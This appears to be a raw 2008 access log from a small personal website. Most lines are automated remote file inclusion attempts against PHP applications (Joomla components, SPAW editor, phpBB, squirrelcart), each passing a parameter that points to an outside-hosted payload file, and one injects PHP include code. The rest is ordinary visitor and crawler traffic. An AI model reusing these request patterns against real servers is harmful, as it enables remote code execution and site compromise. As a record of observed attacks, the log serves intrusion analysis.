195.55.243.132 - - [10/Aug/2008:11:41:28 -0700] "GET /logs/access.log//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
195.55.243.132 - - [10/Aug/2008:11:41:30 -0700] "GET //?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.813" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:11:42:06 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:11:42:09 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.98.87.14 - - [10/Aug/2008:11:42:17 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.98.87.14 - - [10/Aug/2008:11:42:19 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 200 18609 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.0.98 - - [10/Aug/2008:11:42:21 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ttvf.org/chat/inc/cmses/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.0.98 - - [10/Aug/2008:11:42:21 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.ttvf.org/chat/inc/cmses/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.169.158.65 - - [10/Aug/2008:11:42:55 -0700] "GET /logs/access_071228.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [10/Aug/2008:11:42:55 -0700] "GET /logs/access_071228.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [10/Aug/2008:11:42:55 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [10/Aug/2008:11:42:55 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [10/Aug/2008:11:42:55 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [10/Aug/2008:11:42:55 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.98.87.14 - - [10/Aug/2008:11:42:57 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.98.87.14 - - [10/Aug/2008:11:43:00 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 200 18625 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.236.106 - - [10/Aug/2008:11:43:09 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.236.106 - - [10/Aug/2008:11:43:09 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.236.106 - - [10/Aug/2008:11:43:09 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.236.106 - - [10/Aug/2008:11:43:10 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:11:43:20 -0700] "GET /logs/access_080124.log%20//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:11:43:36 -0700] "GET /phphtml.php?htmlclass_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:11:43:36 -0700] "GET /logs/access_080724.log/phphtml.php?htmlclass_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:11:43:37 -0700] "GET /logs/phphtml.php?htmlclass_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:11:43:44 -0700] "GET /logs/access_080226.log/phphtml.php?htmlclass_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.70.83.4 - - [10/Aug/2008:11:43:56 -0700] "GET /logs/access_080418.log/phphtml.php?htmlclass_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [10/Aug/2008:11:43:58 -0700] "GET /logs/access_080324.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [10/Aug/2008:11:44:02 -0700] "GET /logs/access_080324.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.42.218.66 - - [10/Aug/2008:11:44:23 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/metal_lord64/bat/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
69.42.218.66 - - [10/Aug/2008:11:44:23 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/metal_lord64/bat/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
213.149.247.12 - - [10/Aug/2008:11:44:33 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.149.247.12 - - [10/Aug/2008:11:44:33 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.149.247.12 - - [10/Aug/2008:11:44:36 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.149.247.12 - - [10/Aug/2008:11:44:36 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.198.72 - - [10/Aug/2008:11:44:39 -0700] "GET /logs/access_080118.log//squirrelcart/cart.php/popup_window.php?site_isp_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.198.72 - - [10/Aug/2008:11:45:15 -0700] "GET /logs/access_080118.log//squirrelcart/cart.php/popup_window.php?site_isp_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:11:45:47 -0700] "GET /logs/access_080528.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:11:46:33 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:11:46:37 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:11:46:46 -0700] "GET /logs/access_080226.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
193.178.228.12 - - [10/Aug/2008:11:47:09 -0700] "GET /logs/access_080118.log//squirrelcart/cart.php/popup_window.php?site_isp_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:11:47:14 -0700] "GET /logs/access_080110.log/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:11:47:24 -0700] "GET /logs/access_080528.log%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [10/Aug/2008:11:47:34 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:11:47:45 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:11:47:46 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:11:47:46 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
65.9.139.75 - - [10/Aug/2008:11:47:48 -0700] "GET / HTTP/1.1" 200 18257 "http://www.st-owners.com/forums/showthread.php?s=37d354619df93d406a5f6d9e82bddc12&t=44089" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.dmulk.com"
65.9.139.75 - - [10/Aug/2008:11:47:48 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9232 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "dmulk.com"
65.9.139.75 - - [10/Aug/2008:11:47:49 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.1" 200 5241 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "dmulk.com"
65.9.139.75 - - [10/Aug/2008:11:47:49 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.1" 200 4019 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "dmulk.com"
65.9.139.75 - - [10/Aug/2008:11:47:49 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.1" 200 29867 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "dmulk.com"
65.9.139.75 - - [10/Aug/2008:11:47:50 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.1" 200 8888 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "dmulk.com"
65.9.139.75 - - [10/Aug/2008:11:47:50 -0700] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.1" 200 6722 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "dmulk.com"
65.9.139.75 - - [10/Aug/2008:11:47:50 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgwide.jpg HTTP/1.1" 200 1014 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "dmulk.com"
65.9.139.75 - - [10/Aug/2008:11:47:50 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "dmulk.com"
65.9.139.75 - - [10/Aug/2008:11:47:51 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 200 42010 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "dmulk.com"
65.9.139.75 - - [10/Aug/2008:11:47:51 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 200 42010 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "dmulk.com"
65.9.139.75 - - [10/Aug/2008:11:47:51 -0700] "GET /blog/wp-content/themes/default/images/kubrickheader.jpg HTTP/1.1" 200 7868 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "dmulk.com"
65.9.139.75 - - [10/Aug/2008:11:47:54 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=1&739 HTTP/1.1" 200 19014 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "dmulk.com"
65.9.139.75 - - [10/Aug/2008:11:47:55 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=3&196 HTTP/1.1" 200 6289 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "dmulk.com"
65.9.139.75 - - [10/Aug/2008:11:47:57 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0071.jpg HTTP/1.1" 200 451017 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "dmulk.com"
64.59.70.177 - - [10/Aug/2008:11:47:58 -0700] "GET /logs/access_080108.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.avm.su/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.9.139.75 - - [10/Aug/2008:11:47:59 -0700] "GET /blog/wp-content/uploads/2008/04/img_1120.JPG HTTP/1.1" 200 1376256 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "dmulk.com"
65.9.139.75 - - [10/Aug/2008:11:47:59 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0136_0.jpg HTTP/1.1" 200 262144 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "dmulk.com"
202.70.83.4 - - [10/Aug/2008:11:48:04 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.70.83.4 - - [10/Aug/2008:11:48:05 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.194.76.177 - - [10/Aug/2008:11:48:07 -0700] "GET /logs/access_080118.log//squirrelcart/cart.php/popup_window.php?site_isp_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [10/Aug/2008:11:48:07 -0700] "GET //squirrelcart/cart.php/popup_window.php?site_isp_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [10/Aug/2008:11:48:08 -0700] "GET /logs//squirrelcart/cart.php/popup_window.php?site_isp_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:11:48:28 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:11:48:29 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.55.243.132 - - [10/Aug/2008:11:48:36 -0700] "GET //errors.php?error=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.185.237.77 - - [10/Aug/2008:11:48:54 -0700] "GET /errors.php?error=http://www.tramiche.org/l33tb1t.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
72.248.189.215 - - [10/Aug/2008:11:48:55 -0700] "GET /logs/access_080216.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [10/Aug/2008:11:48:57 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 200 18625 "-" "libwww-perl/5.65" "www.dmulk.com"
72.248.189.215 - - [10/Aug/2008:11:48:59 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:11:49:07 -0700] "GET /logs/access.log//errors.php?error=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:11:49:13 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:11:49:13 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.117.241.196 - - [10/Aug/2008:11:49:13 -0700] "GET //errors.php?error=http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:11:49:14 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:11:49:14 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:11:49:18 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:11:49:19 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.248.189.215 - - [10/Aug/2008:11:49:20 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.18.151.242 - - [10/Aug/2008:11:49:27 -0700] "GET /logs/access_080401.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.bluethirtytwo.com/albums/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.18.151.242 - - [10/Aug/2008:11:49:27 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.bluethirtytwo.com/albums/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.18.151.242 - - [10/Aug/2008:11:49:43 -0700] "GET /logs/access_080302.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.bluethirtytwo.com/albums/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.18.151.242 - - [10/Aug/2008:11:50:00 -0700] "GET /logs/access_080401.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.bluethirtytwo.com/albums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [10/Aug/2008:11:50:00 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.bluethirtytwo.com/albums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [10/Aug/2008:11:50:00 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.bluethirtytwo.com/albums/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.74.183 - - [10/Aug/2008:11:50:12 -0700] "GET /administrator/components/com_joomlaradiov5/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
72.29.74.183 - - [10/Aug/2008:11:50:12 -0700] "GET /logs/access_080404.log/administrator/components/com_joomlaradiov5/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
72.29.74.183 - - [10/Aug/2008:11:50:12 -0700] "GET /logs/administrator/components/com_joomlaradiov5/errors.php?error=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
74.6.17.183 - - [10/Aug/2008:11:50:32 -0700] "GET /bikes/dteel/?S=D HTTP/1.0" 200 2739 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:11:50:33 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:11:50:33 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:11:50:42 -0700] "GET /logs/access_080213.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:11:50:42 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:11:50:42 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:11:50:42 -0700] "GET /logs/access.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
